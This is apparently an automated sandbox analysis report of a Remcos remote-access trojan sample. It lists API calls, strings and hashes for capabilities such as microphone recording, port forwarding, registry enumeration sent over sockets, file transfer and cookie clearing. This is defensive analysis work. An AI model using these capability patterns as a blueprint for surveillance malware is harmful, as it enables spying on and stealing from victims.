                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                  • API String ID: 3578746661-4192532303
                                                  • Opcode ID: 3e375b67f750569bd023fdf115c64c74df88fc4c5cfe76b86ab1cdf68cb4efa0
                                                  • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                  • Opcode Fuzzy Hash: 3e375b67f750569bd023fdf115c64c74df88fc4c5cfe76b86ab1cdf68cb4efa0
                                                  • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 840d7f1a9737815c687a4246931b70dd3ae60b00313dd0bb7128915435e4b1e8
                                                  • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                  • Opcode Fuzzy Hash: 840d7f1a9737815c687a4246931b70dd3ae60b00313dd0bb7128915435e4b1e8
                                                  • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401AD3
                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                  • API String ID: 3809562944-3643129801
                                                  • Opcode ID: b8eed0d151ccb6e5a82338ef45dd5c7a6e48c5c8e1108a83b815f9cf038dc0a3
                                                  • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                  • Opcode Fuzzy Hash: b8eed0d151ccb6e5a82338ef45dd5c7a6e48c5c8e1108a83b815f9cf038dc0a3
                                                  • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                  • waveInStart.WINMM ref: 00401A81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: XCG$`=G$x=G
                                                  • API String ID: 1356121797-903574159
                                                  • Opcode ID: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                  • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                  • Opcode Fuzzy Hash: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                  • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                    • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                    • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                    • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                  • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                  • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                  • TranslateMessage.USER32(?), ref: 0041C9FB
                                                  • DispatchMessageA.USER32(?), ref: 0041CA05
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aedd147e534ec43f5761457850892578a0c13fdb57cd67c13296e0f558563f7f
                                                  • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                  • Opcode Fuzzy Hash: aedd147e534ec43f5761457850892578a0c13fdb57cd67c13296e0f558563f7f
                                                  • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                  • __alloca_probe_16.LIBCMT ref: 00452C91
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                  • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                  • __freea.LIBCMT ref: 00452DAA
                                                  • __freea.LIBCMT ref: 00452DB6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: 80432d720a632dfc9e5c8c48fa1949e662c4ca6cc91317bc06fdd6919e85f732
                                                  • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                  • Opcode Fuzzy Hash: 80432d720a632dfc9e5c8c48fa1949e662c4ca6cc91317bc06fdd6919e85f732
                                                  • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                  • _free.LIBCMT ref: 00444714
                                                  • _free.LIBCMT ref: 0044472D
                                                  • _free.LIBCMT ref: 0044475F
                                                  • _free.LIBCMT ref: 00444768
                                                  • _free.LIBCMT ref: 00444774
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                                                  • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                  • Opcode Fuzzy Hash: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                                                  • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                  APIs
                                                  • ExitThread.KERNEL32 ref: 004017F4
                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: T=G$p[G$>G$>G
                                                  • API String ID: 1596592924-2461731529
                                                  • Opcode ID: 545ac3889f4b45db521475ff1cf8cd934c631e9cf74b55309a3a6c1d0c1c190d
                                                  • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                  • Opcode Fuzzy Hash: 545ac3889f4b45db521475ff1cf8cd934c631e9cf74b55309a3a6c1d0c1c190d
                                                  • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: TUF$TUFTUF$>G$DG$DG
                                                  • API String ID: 3114080316-72097156
                                                  • Opcode ID: 6f9ef955a0ac96b712c217d753342c1164fcb96d3e76c54d8ddb4c3c50454292
                                                  • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                  • Opcode Fuzzy Hash: 6f9ef955a0ac96b712c217d753342c1164fcb96d3e76c54d8ddb4c3c50454292
                                                  • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: d49a513a8f772e1d247ac04a17e36de11b16263c7a5ab00d967c6cc7a5d8721f
                                                  • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                  • Opcode Fuzzy Hash: d49a513a8f772e1d247ac04a17e36de11b16263c7a5ab00d967c6cc7a5d8721f
                                                  • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                  APIs
                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • _wcslen.LIBCMT ref: 0041A8F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 3286818993-703403762
                                                  • Opcode ID: d31394a1e59778cac49212debd323097d31c222899c914d30ad8a284f22ebc6c
                                                  • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                  • Opcode Fuzzy Hash: d31394a1e59778cac49212debd323097d31c222899c914d30ad8a284f22ebc6c
                                                  • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                  APIs
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                                                  • API String ID: 1133728706-1738023494
                                                  • Opcode ID: 277169f527fc92256fa41abbcb139495d6dad3c9a69d05ef014fe4e0c51cfce4
                                                  • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                  • Opcode Fuzzy Hash: 277169f527fc92256fa41abbcb139495d6dad3c9a69d05ef014fe4e0c51cfce4
                                                  • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                  APIs
                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                  • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
